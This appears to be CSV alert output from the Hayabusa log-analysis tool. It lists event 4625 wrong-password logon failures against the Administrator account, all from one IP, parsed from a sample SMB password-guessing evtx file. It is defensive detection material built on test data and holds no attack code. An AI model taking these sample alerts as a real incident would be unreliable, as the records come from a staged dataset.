2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQKTlzx2gq9ayAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tCzVponBvb9mbyIr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mSwnrFv90KjN2cqj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QX5TLs2MPkia1cmk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ammLKlG1Q5awQGvN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ1ijJjPJbF4uFlo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZOLnwIzpGz03Yjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xS8U3UQNz6l0LZn0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no6cftQ5MF1fjZ0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5WHS6jVRnCUH0Rb5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i3oGLwrCJXJOauf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1sxPrDYV3rr4pGJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Osysh2O2A3A2bN22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FsInW9EMJZU8FOrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ge8do8TM4GG1atMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w5GLbpVsAhGqCiq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8eQXeW1VpRU0ptMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhLosoA2parzTnW9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MCFTP4gVGEKFKuRI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALrDwJz2cta9fcXB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZZNXGw28osMQLjub : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wQzvMnwYuEQRO7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UloOAIgGuj6NecfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVSeLo2PRgGmf83Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SaCFO8CPFLuERugV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCwV1D4L5BDZSriK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QPhLQsM4R2ua4SxW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fwgp52JNi7xnTxpN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2GutBDenjweAluz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wflcgg5ebqu8hHGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jXaaYSU2pakw6IsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfJnBv3eA8wZttML : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOXSI0jPfbvW4dAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JW6aX5mNz7cETsl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVuJLXJzlVnDLT4Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtSwhwnApnPI9AkO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1peOkjbd1WXGEAAM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tbw3V9MtLIcxr65R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CEZ2v1f6t0luDj4D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R0omMppAFlFhE1mG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0jMvVN9eSeGW3zcN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnFNYabbO7IpbVku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KtyTTNdqVikZGYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DCChjnFv2hMXXwgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvIYRZSomaJYJOH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEirUFRscaOwTuAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwQgMM9H1oN4te9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JbGILYTcFwtYbDk1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5KzNsgWvyUhNEHd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGvwbOtP3A5eDKCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YZvtNNX511hIleST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJBRTeW6OQtNrt5u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hovgq99STVt2GzrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4kpT3gf0VCAVuVSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiB04AvkYp0PP3n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PPluKgaiT10oC35V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8nCOM9uUeqv9QBx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dSPrrNCh2FSWZKbI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLDnCjr4pSdKAMX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0UnmfB7lcXKEAvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogjMSxcUw7cF5dMa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75uB8ejsSV5CbagM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5MMHLnyrzBQxluHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QXLn6fpmR52RBAz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcdlrSUzcFNpaK5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJjiRO5rJzZ8XtqP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncBraDdG2htkHjXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lo9DNrL44Z2S2SYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QKcFiKC5QiIoHtxy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sqvq9GwuPCO15lUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XzgtJ3qUmkFiIY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1wc1Hjb4AK0Np1q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKYNy0JyxIlFusMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IrcKp13ut9M0pCi0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B3lJSH0r8iHAVhPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
